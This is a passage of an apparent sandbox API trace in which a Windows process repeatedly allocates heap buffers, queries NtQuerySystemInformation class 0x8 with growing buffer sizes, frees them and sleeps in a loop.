ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.689] Sleep (dwMilliseconds=0x110) [0237.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.736] Sleep (dwMilliseconds=0x110) [0237.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.809] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.814] Sleep (dwMilliseconds=0x110) [0237.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.953] Sleep (dwMilliseconds=0x110) [0238.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.035] Sleep (dwMilliseconds=0x110) [0238.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.194] Sleep (dwMilliseconds=0x110) [0238.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.207] Sleep (dwMilliseconds=0x110) [0238.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.226] Sleep (dwMilliseconds=0x110) [0238.245] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.245] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.246] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.246] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.247] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.252] Sleep (dwMilliseconds=0x110) [0238.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.288] Sleep (dwMilliseconds=0x110) [0238.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.303] Sleep (dwMilliseconds=0x110) [0238.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.318] Sleep (dwMilliseconds=0x110) [0238.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.333] Sleep (dwMilliseconds=0x110) [0238.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0238.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0238.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0238.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.347] Sleep (dwMilliseconds=0x110) [0238.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0238.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0238.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0238.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0238.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0238.362] 